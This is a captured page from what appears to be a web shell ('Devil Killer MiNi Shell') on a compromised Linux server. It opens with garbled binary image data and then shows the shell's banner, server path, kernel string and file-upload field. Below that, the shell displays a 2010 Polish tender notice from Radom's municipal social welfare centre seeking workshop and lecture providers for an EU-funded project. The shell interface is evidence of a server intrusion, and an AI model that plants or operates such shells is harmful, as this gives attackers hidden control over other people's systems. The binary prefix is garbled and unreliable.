JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100729/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100729/230452-N-2010.html

<p class="kh_header"><b>Radom: ŚWIADCZENIE USŁUG Z ZAKRESU WARSZTATÓW I PRELEKCJI NA RZECZ UCZESTNIKÓW W RAMACH PROJEKTU OPERACYJNEGO KAPITAŁ LUDZKI</b><br>
<b>Numer ogłoszenia: 230452 - 2010; data zamieszczenia: 29.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Limanowskiego 134, 26-600 Radom, woj. mazowieckie, tel. 048 3608701, faks 048 3608706.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG Z ZAKRESU WARSZTATÓW I PRELEKCJI NA RZECZ UCZESTNIKÓW W RAMACH PROJEKTU OPERACYJNEGO KAPITAŁ LUDZKI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług z zakresu warsztatów i prelekcji prowadzonych na rzecz uczestników Beneficjentów Ostatecznych projektu systemowego pt.: Aktywność szansą na lepsze jutro realizowanego w ramach Poddziałania 7.1.1 - Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, Działania 7.1 Priorytetu VII Programu Operacyjnego Kapitał Ludziki. Zamówienie jest współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Zamówienie podzielone jest na cztery części.
 

Szczegółowy opis przedmiotu zamówienia:
1.Część I zamówienia
Przedmiotem zamówienia jest świadczenie usług z zakresu:
1.1.Warsztatów autoprezentacji dla 10 grup liczących od 10 do 15 osób, po 16 godzin 
w łącznym wymiarze 160 godzin. 
Warsztaty powinny obejmować: 14 godzin zajęć praktycznych i 2 godziny teoretycznych (2 spotkania po 8 godzin).
Warsztaty mają na celu m.in.:
przygotowanie uczestników do stworzenia profesjonalnego imagu
budowanie integracji pomiędzy uczestnikami
weryfikacja samooceny osoby w zakresie jej mocnych i słabych stron 
Program przedmiotowych warsztatów powinien obejmować co najmniej następujące zagadnienia: 
1)Budowanie integracji
2)Autoprezentacja osoby - jej dokonania i oczekiwania związane z uczestniczeniem w zajęciach
3)Samopoznanie mocnych stron osoby i jej relacji społecznych.
4)Weryfikacja samooceny osoby w zakresie jej mocnych i słabych stron
5)Podstawowe umiejętności komunikacyjne z otoczeniem społecznym
6)Zasady skutecznej komunikacji - umiejętność aktywnego słuchania 
7)Zakłócenia w komunikacji - czynniki powodujące zakłócenia.
8)Komunikacja niewerbalna
9)Autoprezentacja
10)Wizaż

1.2.Warsztatów kreowania wizerunku dla 13 grup liczących od 10-15 osób po 16 godzin, 
w łącznym wymiarze 208 godzin.
Warsztaty powinny obejmować: 14 godzin zajęć praktycznych i 2 godziny zajęć teoretycznych (2 spotkania po 8 godzin).
Warsztaty polegać będą na udzielaniu porad w zakresie kreowania wizerunku poprzez wygląd zewnętrzny (higienę osobistą, ubiór, fryzurę, makijaż, dodatki) i mają na celu naukę uczestników m.in. w zakresie:
lepszej prezentacji osób,
odpowiedniej prezentacji osoby bądź osób w danej sytuacji,
konieczności wprowadzenia identyfikacji wizualnej wizerunku poszczególnych osób w danym segmencie struktur organizacji i firm.
Program przedmiotowych warsztatów powinien obejmować co najmniej następujące zagadnienia: 
1)Podstawowe zasady kreowania wizerunku:
Czy jest i skąd pochodzi świadomość własnego wizerunku?
Elementy składowe wizerunku
Struktura skuteczności komunikatów wizerunku
Wizerunek mentalny i wizerunek fizyczny - prawidłowe rozwiązania
Analiza osoby - aspekty doboru garderoby, kolorystyki, dodatków, fryzury, obuwia itp.
Świadome posługiwanie się elementami wizerunku jako czynnikami decydującymi i ułatwiającymi komunikację
Podstawowe zasady doboru garderoby i elementów prawidłowego wizerunku
Garderoba na dzień i na wieczór - zasady doboru
2)Makijaż - dopełnienie wizerunku
3)Szczegóły męskiego wizerunku.

2.Część II zamówienia 
Przedmiotem zamówienia świadczenie usług z zakresu:
2.1.Warsztatów organizowania środowiska lokalnego dla 3 grup od 10 do 15 osób, po 30 godzin w łącznym wymiarze 90 godzin. Warsztaty powinny obejmować: 16 godzin zajęć praktycznych i 14 godzin zajęć teoretycznych. (5 spotkań po 6 godzin).
Warsztaty mają na celu m.in.:
zwiększenie umiejętności uczestników w zakresie badań problemów występujących w społecznościach lokalnych,
zwiększenie wiedzy uczestników na temat społeczności lokalnej, jej rozwoju oraz znaczenia, jakie odgrywa w życiu człowieka,
zwiększenie wiedzy uczestników na temat samopomocy, działań obywatelskich ich rozwoju oraz znaczenia, jakie odgrywają w życiu człowieka,
zwiększenie wiedzy uczestników z zakresu metody animacji społecznej, roli zadań animatorki społecznej w grupach oraz społeczności lokalnej.
Program przedmiotowych warsztatów powinien obejmować co najmniej następujące zagadnienia: 
1)Diagnoza problemów:
Co warto wiedzieć o mieszkańcach?
Cechy społeczno - demograficzne członków danej społeczności.
Identyfikacja znaczących osób i grup w swojej społeczności
Problem i potrzeba
Wygenerowanie problemów występujących w ich społecznościach 
Badanie potrzeb i problemów
Analiza wybranego problemu - drzewo problemów i drzewo celów
2)Społeczność lokalna i jej rozwój
3)Działania samopomocowe i obywatelskie
4)Animator w społeczności lokalnej 
5)Wolontariat w środowisku lokalnym

2.2.Warsztatów racjonalnego gospodarowania budżetem domowym dla 6 grup (od 10 do 15 osób) po 16 godzin dla każdej z grup, w łącznym wymiarze 96 godzin. 
Warsztaty powinny obejmować 8 godzin zajęć praktycznych i 8 godzin zajęć teoretycznych (2 spotkania po 8 godzin). 
Warsztaty mają na celu m.in.:
przygotowanie uczestników do poszerzenia swojej wiedzy z zakresu efektywnego gospodarowania budżetem domowym,
przybliżenie zasad systematycznego planowania i podsumowywania budżetowego celem kontrolowania stanu domowych finansów,
umiejętne zestawienie przychodów i planowanych wydatków, które pozwolą na przeanalizowanie struktury dokonywanych zakupów i ustaleniu ich hierarchii i możliwości ich ponoszenia. 
Program przedmiotowych warsztatów powinien obejmować co najmniej następujące zagadnienia: 
1)Pojęcie budżetu i jego zastosowanie:
Przybliżenie pojęcia budżetu i celów jego konstruowania.
Omówienie różnić i podobieństw pomiędzy budżetem państwa, firmy a budżetem domowym.
Metody tworzenia budżetu i jego przystosowanie do skali gospodarstwa domowego.
Dlaczego warto kontrolować wydatki? Jak planować i systematyzować koszty?
Co to jest deficyt budżetowy? Jak go uniknąć i pokryć kiedy już powstanie?
2)Budżet domowy:
Cel tworzenia budżetu domowego
Adaptacja podstawowych zasad ekonomii do warunków domowych.
Metody tworzenia zestawień. Wady i zalety różnych metod i sposobów ich prowadzenia
Analiza budżetu. Jak czytać wyniki i podsumowania? Jak podejmować decyzje na ich podstawie?
Monitorowanie wydatków.
3)Organizacja domowego budżetu:
Źródła dochodów
Rodzaje wydatków
Racjonalne planowanie
Budowanie modelu osobistego budżetu
4)Oszczędzanie na wyznaczone cele:
Plan zakupu dóbr trwałego użytku
Gromadzenie zasobów na wydatki okazjonalne
Tworzenie kapitału rezerwowego
Zasada 10-28-83 czyli nie odkładaj decyzji na później. 
5)Jak rozsądnie wydawać pieniądze?
Jak zbudować strukturę wydatków?
Co i gdzie kupować?
Jak czytać ceny?
Jak podejmować decyzje zakupowe?

2.3.Warsztatów przedsiębiorczości dla 2 grup liczących od 10 do 15 osób, po 24 godziny 
w łącznym wymiarze 48 godzin. Warsztaty powinny obejmować: 16 godzin zajęć praktycznych i 8 godzin zajęć teoretycznych. (3 spotkania po 8 godzin).
Warsztaty mają na celu m.in.:
przygotowanie uczestników szkolenia do uruchomienia i prowadzenia dokumentacji biurowej i księgowej,
przygotowanie do praktycznego wykorzystania posiadanych przez uczestników możliwości w celach zarobkowych.
Program przedmiotowych warsztatów powinien obejmować co najmniej następujące zagadnienia: 
1)Zasady prowadzenia działalności gospodarczej:
Źródła prawa działalności gospodarczej
Podejmowanie indywidualnej działalności gospodarczej
Formy prawne małych firm
Prawo cywilne i handlowe
Typowe umowy cywilne
Wybór formy opodatkowania
Systemy podatkowe ewidencyjne, sprawozdawcze
2)Rachunkowość i podatki
Formy opodatkowania działalności gospodarczej
Dowody księgowe
Obowiązek prowadzenia Podatkowej Księgi Przychodów i Rozchodów
Zasady dokonywania zapisów w Podatkowej Księgi Przychodów i Rozchodów
Deklaracje podatkowe - miesięczne i roczne rozliczenia z Urzędem Skarbowym
Podstawa opodatkowania i stawki podatkowe
Podatek od towarów i usług ( VAT)
Sprzedaż i fakturowanie
Ubezpieczenia społeczne
3)Biznesplan
Biznes plan - zasady tworzenia;
Narzędzia zarządzania
Znaczenie Biznes planu
Możliwości wykorzystania
Weryfikacja poprawności własnego planu działania
Wsparcie dla przedsiębiorców z Funduszy Strukturalnych

3.Część III zamówienia
Przedmiotem zamówienia jest świadczenie usług z zakresu warsztatów kulinarnych dla 1 grupy liczącej do 15 osób, w łącznym wymiarze 30 godzin. Warsztaty mają obejmować: 24 godziny zajęć praktycznych i 6 godziny teoretycznych (6 spotkań po 5 godzin).
Warsztaty mają na celu m.in:
zwiększenie wiedzy uczestników na temat zasad zdrowego żywienia,
zdobycie praktycznych umiejętności sztuki kulinarnej.
Program warsztatów ma obejmować m.in. następujące zagadnienia:
Przybliżenie zasad zdrowego żywienia
Dobór produktów sezonowych do przygotowywania potraw, dobieranie rodzajów mięs do potraw
Metody i sposoby gotowania
Przyrządzanie potraw i przystawek wykorzystując dostępne na rynku mięsa, ryby, nabiał i warzywa
Prezentacja potraw.

4.Część IV zamówienia
Przedmiotem zamówienia jest świadczenie usług z zakresu:
4.1.Prelekcji na temat zdrowego stylu życia i dbałości o zdrowie dla 4 grup liczących od 10 do 15 osób, w łącznym wymiarze 22 godzin:
2 grupy po 4 godziny,
1 grupa po 5 godzin, 
1 grupa - 9 godzin (3 spotkania po 3 godziny).
Celem prelekcji jest edukacja i uświadomienie uczestników spotkań na temat zdrowego stylu życia i dbania o własne zdrowie. 
Program prelekcji powinien obejmować m.in. następujące zagadnienia:
Zdrowie - definicja według Światowej Organizacji Zdrowia oraz definicja pojęcia Zdrowy styl życia,
Dbałość o zdrowie w aspekcie: medycznym, prawidłowego odżywiania (diety), dbałości o higienę ciała, włosów i skóry.,
Odżywianie zgodne z piramidą zdrowia, zagrożenia dla zdrowia wynikające z rozwoju cywilizacyjnego,
Wzorce prawidłowej higieny ciała człowieka, aktywność fizyczna, relaks, zagrożenia słoneczne, zapachowe, detergenty,
Unikanie palenia papierosów, używania narkotyków itp. dbałość o zdrowie psychiczne.

Osoby prowadzące prelekcje powinny posiadać wykształcenie wyższe w kierunku: dietetyka lub medycyna lub pielęgniarstwo, a także doświadczenie z zakresu prowadzenia zajęć grupowych lub prelekcji lub wykładów.

4.2.Preselekcji z zakresu pierwszej pomocy przedlekarskiej dla 1 grupy liczącej do 10 osób w łącznym wymiarze 4 godzin. 
Celem prelekcji jest przybliżenie uczestnikom spotkania czynności jakie należy wykonać w razie wypadku, urazu lub nagłego ataku choroby w celu ochrony życia lub zdrowia poszkodowanego oraz zminimalizowania niekorzystnych następstw zanim będzie możliwe udzielenie specjalistycznej pomocy medycznej. 
Program prelekcji ma obejmować m.in. następujące zagadnienia:
Podstawowe wiadomości z zakresu budowy i funkcjonowania organizmu ludzkiego;
Najczęściej spotykane urazowe i nieurazowe stany zagrożenia życia;
Oparzenia, odmrożenia, urazy otwarte i urazy zamknięte;
Resuscytacja bez przyrządowa dzieci i dorosłych, zatamowanie krwotoków i działanie przeciwwstrząsowe,
ułożenie poszkodowanego w pozycji bezpiecznej.

Osoby prowadzące prelekcje powinny posiadać wyższe wykształcenie, a także uprawnienia do prowadzenia szkoleń z zakresu udzielania pierwszej pomocy i bhp lub posiadać kwalifikacje ratownika medycznego, oraz posiadać doświadczenie zawodowe w prowadzeniu zajęć grupowych lub i prelekcji lub i wykładów.

4.3.Prelekcji Jak być mamą i pracować dla 1 grupy liczącej do 15 osób w łącznym wymiarze 24 godzin (4 spotkania po 6 godzin).
Celem prelekcji jest przygotowanie młodych matek, które po okresie macierzyństwa mają wyjść z domu, podjąć zatrudnienie do pozostawienia dziecka pod opieką innych osób oraz radzenia sobie jednocześnie w roli matki i pracownika. 
Program prelekcji obejmuje następujące zagadnienia:
Problem rozstania - przygotowanie zarówno matki jak i dziecka do wzajemnej nieobecności, przygotowanie dziecka do pozostania w domu z inną, obcą osobą, przygotowanie dziecka do pójścia do przedszkola,
Kodeks pracy: przywileje i uprawnienia pracującej mamy, nieletni w świetle prawa,
przygotowanie do rozmowy w sprawie pracy, jak pogodzić obowiązki dobrej mamy i dobrego pracownika, 
wybór właściwej opieki nad dzieckiem w czasie nieobecności mamy, jak i gdzie szukać oraz jak sprawdzić kompetencje opiekunki do dzieci, przygotowanie do rozmowy z opiekunką. 

Osoby prowadzące prelekcje powinny posiadać wykształcenie wyższe w kierunku: psycholog lub prawnik lub doradca zawodowy bądź też ukończone studia podyplomowe w kierunku doradca zawodowy, a także posiadać doświadczenie zawodowe w prowadzeniu prelekcji lub i wykładów.

4.4.Prelekcji z zakresu zarządzania własnymi zasobami dla 1 grupy liczącej do 15 osób w łącznym wymiarze 12 godzin (2 spotkania po 6 godzin).
Celem prelekcji jest zdobycie przez uczestników spotkania umiejętności organizacyjnych związanych z planowaniem czasu i wykonywaniem codziennych obowiązków, a także planowaniem wydatków i zarządzaniem domowym budżetem. 
Program prelekcji ma obejmować m.in. następujące zagadnienia:
Zarządzanie budżetem domowym, planowanie wydatków i gromadzenie zasobów na wydatki okazjonalne. Co i gdzie kupować? Jak czytać ceny? Jak podejmować decyzje zakupowe?
Planowanie czasu wolnego sobie i dzieciom, planowanie urlopu,
Przygotowanie harmonogramu codziennych obowiązków, dzielenie obowiązków domowych z życiowym partnerem,
Jak wykorzystać w życiu codziennym zasoby środowiska zamieszkania (pomoc sąsiedzka, koleżeńska itp.).

Osoby prowadzące prelekcje powinny posiadać wykształcenie wyższe oraz doświadczenie zawodowe w prowadzeniu zajęć grupowych lub i prelekcji lub i wykładów.

4.5.Prelekcji na temat praw pacjenta w zakresie dostępności do świadczeń zdrowotnych finansowanych z Narodowego Funduszu Zdrowia dla 1 grupy liczącej do 15 osób w łącznym wymiarze 4 godzin (1 spotkanie). 
Celem prelekcji jest zwiększenie wiedzy uczestników na temat praw pacjenta oraz możliwości i procedur korzystania z usług państwowej służby zdrowia. 
Program prelekcji ma obejmować m.in. następujące zagadnienia: 
prawa pacjenta w świetle ustawy o prawach pacjenta i Rzeczniku Praw Pacjenta,
zakres usług świadczonych przez lekarza pierwszego kontaktu (rodzinnego),
dostępność do badań profilaktycznych i specjalistycznej opieki medycznej,
informacje na temat zasad korzystania z usług sanatoryjnych dla dzieci oraz opiekunów.

Osoby prowadzące prelekcje powinny posiadać wykształcenie wyższe: prawnicze lub administracyjne lub medyczne, a także doświadczenie zawodowe w prowadzeniu zajęć grupowych lub i prelekcji lub i wykładów. 


5.      Informacje dodatkowe w zakresie części I, II, III i IV zamówienia:
1)Wykonawca zobowiązany jest do zagwarantowania  uczestnikom warsztatów bufetu w postaci napojów (min. kawa, herbata, napoje zimne) oraz suchego prowiantu (min. ciasteczka i herbatniki). Wykonawca zobowiązany będzie zapewnić również gorący posiłek w postaci obiadu (min. drugie danie). Wszystkie posiłki powinny spełniać normy żywieniowe wskazane przez Instytutu Żywienia i Żywności, Wykonawca bierze wszelką odpowiedzialność za przestrzeganie przedmiotowych norm. Koszty bufetu i posiłków Wykonawca winien uwzględnić w składanej ofercie.
2)Wykonawca zobowiązany jest na własny koszt zapewnić uczestnikom na własność niezbędne materiały dydaktyczne potrzebne do przyswajania wiedzy teoretycznej oraz inne materiały, w tym notatnik i długopis, odpowiednio oznaczone logotypami Unii Europejskiej, Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki oraz logo Miejskiego Ośrodka Pomocy Społecznej w Radomiu, zgodnie z wytycznymi z dnia 4 lutego 2009 roku Departamentu Zarządzania Europejskim Funduszem Społecznym Ministerstwa Rozwoju Regionalnego- podanymi na stronie internetowej www.efs.gov.pl; koszty te Wykonawca winien uwzględnić w składanej ofercie. 
Zamawiający zastrzega sobie możliwość akceptacji wzorów materiałów, które będą przekazywane uczestnikom. 
3)Wykonawca zobowiązany jest na własny koszt zapewnić uczestnikom na własność: 
a)w zakresie części I zamówienia: tzw. zestaw startowy składający się co najmniej z: palety cieni do powiek, z różu, pudru w kamieniu, tuszu do rzęs, podkładu, szminki lub błyszczyka oraz lakieru do paznokci i kredki do oczu, wszystkie kosmetyki powinny znajdować się w kosmetyczce. Zestaw ten jest niezbędny do przeprowadzenia zajęć praktycznych,
b)w zakresie części II zamówienia: Wykonawca zobowiązany jest na własny koszt zapewnić uczestnikom warsztatów upominek w postaci pendrive ( min. 4 GB), kalkulatora i organizera (format A-5, w oprawie imitującej skórę, z wymiennymi wkładami),
c)w zakresie części III zamówienia: Wykonawca zobowiązany jest na własny koszt zapewnić uczestnikom wszystkie produkty spożywcze niezbędne do przeprowadzenia zajęć praktycznych oraz upominek w postaci książki kucharskiej Kuchnia Polska w twardej oprawie, format A-4, zawierająca minimum 1000 przepisów.
Koszty te Wykonawca winien uwzględnić w składanej ofercie.
4)Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia w granicach administracyjnych miasta Radomia w odpowiednio wyposażonej i dostosowanej do potrzeb Zamawiającego bazie dydaktycznej: 
4.1.w zakresie części I zamówienia:
lokale powinny być dostosowane do potrzeb osób niepełnosprawnych trzy osoby mają problem z poruszaniem się (Wykonawca zobowiązany jest dysponowaniem co najmniej 1 lokalem dostosowanym do potrzeb osób niepełnosprawnych),
lokale dostosowane do potrzeb realizacji działań grupowych (grupy 10-15 osób) wyposażone w podstawowe sprzęty biurowe (krzesła, biurka, itp.),
Wykonawca będzie dysponował lokalami w taki sposób, aby była możliwość jednoczesnego prowadzenia warsztatów z minimum 5 grupami.
4.2.w zakresie części II zamówienia:
co najmniej jeden lokal powinien być dostosowany do potrzeb osób niepełnosprawnych; jedna osoba ma problemy z poruszaniem się (uczestnik warsztatu gospodarowania budżetem),
lokale dostosowane do potrzeb realizacji działań grupowych (grupy 10-15 osób) wyposażone w podstawowe sprzęty biurowe (krzesła, biurka, itp.).
Wykonawca będzie dysponował lokalami w taki sposób, aby była możliwość jednoczesnego prowadzenia warsztatów z minimum 3 grupami
4.3.w zakresie części III zamówienia:
lokale powinny być dostosowane do potrzeb realizacji działań grupowych,
lokale powinny być wyposażone w sprzęty kuchenne umożliwiające zajęcia praktyczne (kuchenki, narzędzia kuchenne, stoły, itp.).
4.4.w zakresie części IV zamówienia:
lokale powinny być dostosowane do potrzeb realizacji działań grupowych (grupy 10-15 osób) wyposażone w podstawowe sprzęty biurowe (krzesła, biurka, itp.).
Wszystkie lokale, z których będą korzystać uczestnicy będą spełniały wymogi wynikające z przepisów BHP, sanitarnych i p.poż.

5)Miejsca, w których realizowane będą zajęcia powinny być odpowiednio oznaczone logotypami Unii Europejskiej, Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki oraz logo Miejskiego Ośrodka Pomocy Społecznej w Radomiu, zgodnie z wytycznymi z dnia 4 lutego 2009 roku Departamentu Zarządzania Europejskim Funduszem Społecznym Ministerstwa Rozwoju Regionalnego.
6)Wykonawca zobowiązany jest na własny koszt zapewnić dojazd uczestnikom wskazanym przez Zamawiającego, z miejsca zamieszkania uczestnika do miejsca odbywania zajęć, a po zakończonych działaniach - z powrotem do miejsca zamieszkania, w wybranej przez Wykonawcę formie. Zamawiający dopuszcza możliwość zapewnienia przejazdu komunikacją miejską - zapewnienie uczestnikom biletów komunikacji miejskiej. Jeżeli uczestnikiem warsztatu będzie osoba niepełnosprawna mająca problem z poruszaniem się, Wykonawca zobowiązany jest zapewnić w/w przejazd środkiem transportu dostosowanym do potrzeb osób niepełnosprawnych;
6.1.w zakresie części I zamówienia: 3 osoby mają problem z poruszaniem się (uczestnicy warsztatów autoprezentacji); 
6.2.w zakresie części II zamówienia: 1 osoba ma problemy z poruszaniem się (uczestnik warsztatu gospodarowania budżetem).
koszty te Wykonawca winien uwzględnić w składanej ofercie.
7)Wykonawca zobowiązany jest do dostosowania programu zajęć jak również przerw między zajęciami do indywidualnych potrzeb grupy, na rzecz której świadczona będzie usługa. 
8)Wykonawca powinien być gotowy do świadczenia usług w miejscu wskazanym przez Zamawiającego.
9)Wykonawca zobowiązany jest realizować przedmiotowe usługi w godzinach od 8 do 16 w dniach od poniedziałku do piątku, według harmonogramu sporządzonego w uzgodnieniu z Zamawiającym, odrębnie dla każdej z części zamówienia. 
10)Wykonawca zobowiązany jest zagwarantować, aby warsztaty przeprowadzane były przez:
10.1.w zakresie części I zamówienia: 
- min. 5 osób z wykształceniem wyższym, posiadających uprawnienia pedagogiczne, z których: co najmniej 2 osoby posiadają doświadczenie zawodowe w zakresie prowadzenia warsztatów autoprezentacji i co najmniej 3 osoby posiadają doświadczenie zawodowe w zakresie prowadzenia warsztatów kreowania wizerunku lub warsztatów wizażu.
10.2.w zakresie części II zamówienia:
- min. 3 osoby z wykształceniem wyższym, posiadające uprawnienia pedagogiczne, doświadczenie w prowadzeniu warsztatów lub kursów lub wykładów w zakresie:  
a) organizowania środowiska lokalnego - co najmniej 1 osoba;
b) gospodarowania budżetem domowym lub przedsiębiorczości - co najmniej 2 osoby.
10.3.w zakresie części III zamówienia:
- min. 1 osoba posiadająca minimum średnie wykształcenie w kierunku technik kucharz i ponad 3-letnie doświadczenie  zawodowe.
10.4.w zakresie części IV zamówienia: min. 5 osób z wykształceniem wyższym oraz posiadających doświadczenie w prowadzeniu zajęć grupowych lub i prelekcji lub i wykładów, z których: 
1 osoba posiada wykształcenie w kierunku: dietetyka lub medycyna lub pielęgniarstwo; 
1 osoba posiada uprawnienia do prowadzenia szkoleń z zakresu udzielania pierwszej pomocy i bhp lub osoba posiadająca kwalifikacje ratownika medycznego,
1 osoba posiada wykształcenie w kierunku: psycholog lub prawnik lub doradca zawodowy, bądź też osoba z ukończonymi studiami podyplomowymi w kierunku doradca zawodowy,
1 osoba posiada wykształcenie: prawnicze lub administracyjne lub medyczne. 
11)Wykonawca zobowiązany jest do sporządzania i prowadzenia dokumentacji wykonanych usług na zasadach i w formie wskazanej przez Zamawiającego. Po zakończeniu realizacji usługi na rzecz poszczególnej grupy Wykonawca zobowiązany jest do przekazania Zamawiającemu kserokopii następujących dokumentów:
1. Dziennik zajęć zawierający: 
a)wykaz uczestników z danymi osobowymi (imię i nazwisko, adres zamieszkania, PESEL), 
b)program warsztatów,
c)harmonogram zajęć, 
d)listy obecności uczestników na każdy dzień zajęć,
e)realizacja programu, 
f)rejestr potwierdzeń przez uczestników warsztatów odbioru materiałów szkoleniowych, 
g)rejestr potwierdzeń przez uczestników warsztatów odbioru posiłków i realizacji usług przewozu na każdy dzień, 
h)rejestr potwierdzeń przez uczestników warsztatów odbioru zaświadczeń certyfikatów. 
2. Zaświadczenia, certyfikaty potwierdzające udział uczestników w warsztatach. 
3. Ankiety oceniające jakość warsztatów.
W.w dokumenty powinny być potwierdzone przez Wykonawcę za zgodność z oryginałem.
